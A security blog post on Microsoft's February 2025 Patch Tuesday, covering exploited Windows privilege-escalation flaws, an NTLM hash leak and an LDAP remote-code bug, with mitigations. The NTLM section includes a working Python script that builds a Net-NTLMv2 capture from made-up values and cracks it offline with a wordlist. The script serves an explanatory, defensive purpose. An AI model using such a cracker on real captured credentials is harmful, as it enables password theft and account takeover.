Stratos Ally

February Fixes: Microsoft’s Critical Security Patches for Exploited Zero-Day Flaws 

DarkSoul

Microsoft fixed 63 flaws in this month’s Patch Tuesday release, including four zero-day vulnerabilities, two of which were already being exploited in the wild. The fixes break down into 3 Critical, 57 Important, 1 Moderate and 2 Low severity issues. Remote code execution bugs make up the largest class in this release, followed by elevation of privilege and then denial of service, so the release touches both code integrity and service availability.

The two actively exploited flaws:

CVE-2025-21391 – Windows Storage Elevation of Privilege Vulnerability: CVSS score 7.1 (AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:F/RL:O/RC:C)

CVE-2025-21418 – Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability: CVSS score 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C)


CVE-2025-21391 – Windows Storage Elevation of Privilege Vulnerability:  

Microsoft fixed an actively exploited elevation-of-privilege bug that lets a local, low-privileged attacker (the vector is AV:L/PR:L) delete files they should not be able to touch. According to the Microsoft advisory, “This vulnerability does not allow disclosure of any confidential information, but could allow an attacker to delete data that could include data that results in the service being unavailable.” Arbitrary file-deletion primitives of this kind are routinely chained into full privilege escalation, which is why Microsoft classes the bug as EoP even though its CVSS vector rates the confidentiality impact as none. Microsoft has not published who reported the flaw or how it is being exploited, but it has confirmed in-the-wild exploitation.

CVE-2025-21418 – Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability:  

CVE-2025-21418 is a privilege escalation vulnerability in the Windows Ancillary Function Driver for WinSock (AFD.sys), the kernel-mode driver that backs the Winsock API. A local attacker with low privileges could exploit it to run code as SYSTEM. A similar flaw in the same component (CVE-2024-38193) was disclosed by Gen Digital in August 2024 as being weaponized by the North Korea-linked Lazarus Group, but it is currently unknown whether the exploitation of CVE-2025-21418 is also tied to Lazarus.

CISA has added both vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, and federal civilian agencies are required to apply the patches by 4 March 2025. Organizations outside that mandate should treat the KEV listing as the same prioritization signal.

CVE-2025-21377 – NTLM Hash Disclosure Spoofing Vulnerability:  

This vulnerability, which was publicly disclosed before the patch shipped, exposes a user’s NTLMv2 authentication response (the Net-NTLMv2 challenge-response sent on the wire, not the NT hash stored on disk) to an attacker. The underlying weakness is external control of a file name or path without proper validation: a file that points at an attacker-controlled UNC path causes Windows to authenticate to that host and send the NTLMv2 response over the network. Per Microsoft, minimal interaction with such a file, such as single-clicking to select it or right-clicking to inspect it, is enough; the user does not have to open or execute it. A captured response can be cracked offline to recover the password or relayed to another service that accepts NTLM, and either path lets the attacker authenticate as the victim. Blocking outbound SMB (TCP 445) at the perimeter and restricting outgoing NTLM traffic to remote servers limit the damage until the patch is applied.
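To make concrete what an attacker gains from a leaked NTLMv2 response, here is an added example in Python; it is not code from the article, from Microsoft or from any tool named here. It builds a Responder/hashcat-style capture line (user::domain:server-challenge:NTProofStr:blob) from a constructed username, domain, password and challenges, then recovers the password by offline guessing, which is what an attacker does with the leak. The MD4 routine is included because the NT hash is MD4 of the UTF-16LE password and hashlib’s MD4 is disabled on many OpenSSL 3 builds; every value (account, domain, password, challenges, wordlist) is made up for the demonstration.

```python
"""Added example (not the article's or Microsoft's code): build a Responder/hashcat-5600
style Net-NTLMv2 capture line from constructed values, then recover the password offline.
Everything below (user, domain, password, challenges, wordlist) is made up for the demo."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib.new('md4') is unavailable on many OpenSSL 3
    builds, and the NT hash is MD4 of the UTF-16LE password, so we carry our own."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            if i < 16:                      # round 1: F, message words in order
                f, k, s, add = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:                    # round 2: G, column order 0,4,8,12,1,5,...
                j = i - 16
                f, k, s, add = ((b & c) | (b & d) | (c & d), (j % 4) * 4 + j // 4,
                                (3, 5, 9, 13)[j % 4], 0x5A827999)
            else:                           # round 3: H, order 0,8,4,12,2,10,6,14,...
                j = i - 32
                f, k, s, add = (b ^ c ^ d, (0, 8, 4, 12)[j % 4] + (0, 2, 1, 3)[j // 4],
                                (3, 9, 11, 15)[j % 4], 0x6ED9EBA1)
            # one MD4 step, then rotate the register roles (A,B,C,D) -> (D,A,B,C)
            a, b, c, d = d, _rotl((a + f + x[k] + add) & MASK, s), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    # MS-NLMP 3.3.2: HMAC-MD5 keyed with the NT hash over UPPER(user) || domain, UTF-16LE
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"),
                    hashlib.md5).digest()


def nt_proof_str(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    # The 16-byte NTProofStr that leaks on the wire: HMAC-MD5 over server challenge || blob
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob,
                    hashlib.md5).digest()


def build_capture(user, domain, password, server_challenge, client_challenge, timestamp=0):
    """Format the response the way Responder / hashcat mode 5600 print it:
    user::domain:server_challenge:NTProofStr:blob. The blob follows the MS-NLMP
    NTLMv2_CLIENT_CHALLENGE layout with the AV pairs reduced to the EOL terminator."""
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4)  # Reserved3, MsvAvEOL, Reserved4
    proof = nt_proof_str(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_netntlmv2(capture: str, wordlist):
    """Offline guess: recompute NTProofStr per candidate and compare with the captured one.
    Returns the recovered password, or None if no candidate matches."""
    user, _, domain, chal_hex, proof_hex, blob_hex = capture.split(":")
    server_challenge, proof, blob = (bytes.fromhex(chal_hex), bytes.fromhex(proof_hex),
                                     bytes.fromhex(blob_hex))
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof_str(candidate, user, domain, server_challenge, blob),
                               proof):
            return candidate
    return None


# Constructed capture: the victim's client authenticated to an attacker-run SMB server that
# issued SERVER_CHALLENGE. No real account, domain or host is involved.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
CLIENT_CHALLENGE = bytes.fromhex("a1b2c3d4e5f60718")
SAMPLE_LINE = build_capture("alice", "CORP", "Winter2025!", SERVER_CHALLENGE, CLIENT_CHALLENGE)
WORDLIST = ["Password1", "Summer2024", "hunter2", "Winter2025!"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered password:", crack_netntlmv2(SAMPLE_LINE, WORDLIST))
```

The proof is keyed by the server challenge, so a captured response cannot be replayed against a different server and it is not usable for pass-the-hash; its value to the attacker is offline cracking (the loop above is what hashcat mode 5600 runs at GPU speed) or live relay to a service that does not enforce signing. That is why the practical mitigations target the outbound authentication itself rather than the hash.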

CVE-2025-21376 – Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability:  

This is a critical RCE vulnerability in the Windows Lightweight Directory Access Protocol (LDAP) service. According to Microsoft, “an unauthenticated attacker could send a specially crafted request to a vulnerable LDAP server. Successful exploitation requires an attacker to win a race condition and could result in a buffer overflow which could be leveraged to achieve remote code execution.” The race condition makes reliable exploitation harder, but no credentials are needed, so domain controllers, which expose LDAP by design, should be patched first; any LDAP listener reachable from untrusted networks deserves a second look.

Microsoft’s February 2025 Patch Tuesday is smaller than January’s, but it carries fixes that need urgent attention: two vulnerabilities already exploited in the wild, two that were publicly disclosed before the patch, and a critical unauthenticated LDAP RCE. Prioritize the two KEV-listed EoP bugs on every Windows host, CVE-2025-21376 on domain controllers and any other system running the LDAP service, and CVE-2025-21377 on user workstations. Every day a known exploited flaw stays unpatched widens the window for attackers; timely updates, combined with the interim mitigations noted above, are the cheapest way to close it.
